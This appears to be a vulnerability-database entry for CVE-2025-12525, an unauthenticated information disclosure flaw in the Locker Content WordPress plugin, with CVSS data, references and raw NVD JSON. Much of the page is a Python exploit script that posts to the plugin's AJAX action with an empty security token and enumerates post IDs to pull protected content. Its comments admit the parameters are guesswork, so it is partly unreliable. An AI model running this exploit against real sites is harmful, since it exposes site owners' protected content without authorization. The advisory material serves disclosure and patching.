CVE-2025-12525

Description

The Locker Content plugin for WordPress is vulnerable to Sensitive Information Exposure in version 1.0.0 via the 'lockerco_submit_post' AJAX endpoint. This makes it possible for unauthenticated attackers to extract content from posts that has been protected by the plugin.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Locker Content plugin for WordPress < 1.0.0

Locker Content plugin for WordPress = 1.0.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-12525 PoC - Locker Content Plugin Information Disclosure
# Affected Version: 1.0.0
# Target: WordPress site with Locker Content plugin installed

import requests
import sys

def check_vulnerability(target_url):
    """
    Check if the target WordPress site is vulnerable to CVE-2025-12525
    """
    # WordPress AJAX endpoint
    ajax_endpoint = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php"
    
    # Target vulnerable action
    action = "lockerco_submit_post"
    
    # Payload to extract protected content
    # The vulnerable parameter may vary - common patterns:
    payload = {
        "action": action,
        "post_id": "1",  # Try different post IDs
        "security": "",  # Empty security token (not required due to bug)
    }
    
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
    }
    
    print(f"[*] Testing target: {target_url}")
    print(f"[*] AJAX Endpoint: {ajax_endpoint}")
    print(f"[*] Sending request to extract protected content...")
    
    try:
        response = requests.post(ajax_endpoint, data=payload, headers=headers, timeout=10)
        
        if response.status_code == 200:
            print(f"[+] Response received (Status: {response.status_code})")
            print(f"[+] Response length: {len(response.text)} bytes")
            
            # Check if content was leaked
            if len(response.text) > 100 and "<!DOCTYPE" not in response.text[:50]:
                print("[!] VULNERABLE - Protected content may have been leaked!")
                print("\n--- Leaked Content Preview ---")
                print(response.text[:500])
                return True
            else:
                print("[-] Target may not be vulnerable or no content returned")
                return False
        else:
            print(f"[-] Unexpected status code: {response.status_code}")
            return False
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False

def enumerate_protected_posts(target_url, start_id=1, end_id=100):
    """
    Enumerate and extract content from multiple protected posts
    """
    ajax_endpoint = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php"
    
    print(f"\n[*] Starting enumeration of posts {start_id} to {end_id}...")
    
    for post_id in range(start_id, end_id + 1):
        payload = {
            "action": "lockerco_submit_post",
            "post_id": str(post_id),
        }
        
        try:
            response = requests.post(ajax_endpoint, data=payload, timeout=5)
            if response.status_code == 200 and len(response.text) > 100:
                print(f"[+] Post ID {post_id}: Content found ({len(response.text)} bytes)")
        except:
            pass

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-12525_poc.py <target_url>")
        print("Example: python cve-2025-12525_poc.py http://example.com")
        sys.exit(1)
    
    target = sys.argv[1]
    check_vulnerability(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-12525
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-12525
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-12525/
[4] VulDB https://vuldb.com/cve/CVE-2025-12525
[5] https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3400155%40locker-content&new=3400155%40locker-content
[6] https://wordpress.org/plugins/locker-content/
[7] https://www.wordfence.com/threat-intel/vulnerabilities/id/927f94b0-2a5d-4d17-a05b-7940d7976158?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-12525", "sourceIdentifier": "[email protected]", "published": "2025-11-25T08:15:48.493", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Locker Content plugin for WordPress is vulnerable to Sensitive Information Exposure in version 1.0.0 via the 'lockerco_submit_post' AJAX endpoint. This makes it possible for unauthenticated attackers to extract content from posts that has been protected by the plugin."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3400155%40locker-content&new=3400155%40locker-content", "source": "[email protected]"}, {"url": "https://wordpress.org/plugins/locker-content/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/927f94b0-2a5d-4d17-a05b-7940d7976158?source=cve", "source": "[email protected]"}]}}